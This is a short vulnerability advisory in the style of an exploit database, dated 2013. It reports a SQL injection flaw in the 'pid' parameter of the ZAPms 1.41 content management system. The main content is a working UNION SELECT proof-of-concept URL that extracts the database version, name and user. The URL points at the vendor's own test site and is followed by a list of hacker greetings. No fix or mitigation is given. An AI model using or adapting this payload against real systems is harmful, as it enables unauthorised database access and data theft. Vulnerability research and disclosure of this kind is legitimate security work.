============================================================================================================= [o] ZAPms <= SQL Injection Vulnerability Software : ZAPms Version : 1.41 Vendor : http://www.zapms.de Author : NoGe Contact : noge[dot]code[at]gmail[dot]com Desc : ZAPms is free open source web content management system, adapted to the needs of businesses on the Internet. The ZAPms offers many features and modules as well as an expansion interface for maximum capabilities. ============================================================================================================= [o] Exploit http://localhost/[path]/products?pid=[SQLi] ============================================================================================================= [o] PoC http://www.zapms.de/test/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product ============================================================================================================= [o] Greetz Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory aJe kaka11 matthews wishnusakti inc0mp13te martfella pizzyroot Genex H312Y noname tukulesto }^-^{ ============================================================================================================= [o] April 09 2013 - Papua, Indonesia